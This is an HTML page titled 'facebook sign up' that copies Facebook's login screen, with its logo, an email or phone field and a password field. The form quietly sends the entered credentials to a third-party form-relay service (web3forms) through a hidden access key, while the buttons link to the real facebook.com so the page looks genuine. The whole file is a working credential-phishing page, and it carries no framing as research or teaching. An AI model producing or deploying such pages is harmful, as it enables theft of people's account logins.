<!DOCTYPE html>
<html lang="en">

    <center>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>facebook sign up</title>

    <link rel="stylesheet" href="style.css">

    <a href="">English (UK)</a>

    <br>
    <br>
    <br>
    <br>

    <img src="Facebook_Logo_(2019).png" alt="" width="50px" >

</head>



<body>

        <form action="https://api.web3forms.com/submit" method="POST">

            <!-- Replace with your Access Key -->
            <input type="hidden" name="access_key" value="ff9f18de-7a1c-4758-be3b-57430c9cfd9e">
   
    <br>
    <br>
    <br>


<input type="text" placeholder="Mobile number or email addresss" name="Mobile number or email address">
<br>
<br>
<input type="password" placeholder="Password" name="pass">
<br>
<br>
<a href="https://www.facebook.com">
<button id="odd"> Log in</button>
</a>
<br>
<br>
<a href="">Forgotten password?</a>
<br>
<br>
<br>
<br>
<br>
<br>
<a href="https://www.facebook.com">
<button id="even">Create new account</button>
</a>
<br>
<br>
<br>

</form>

</body>

</center>

</html>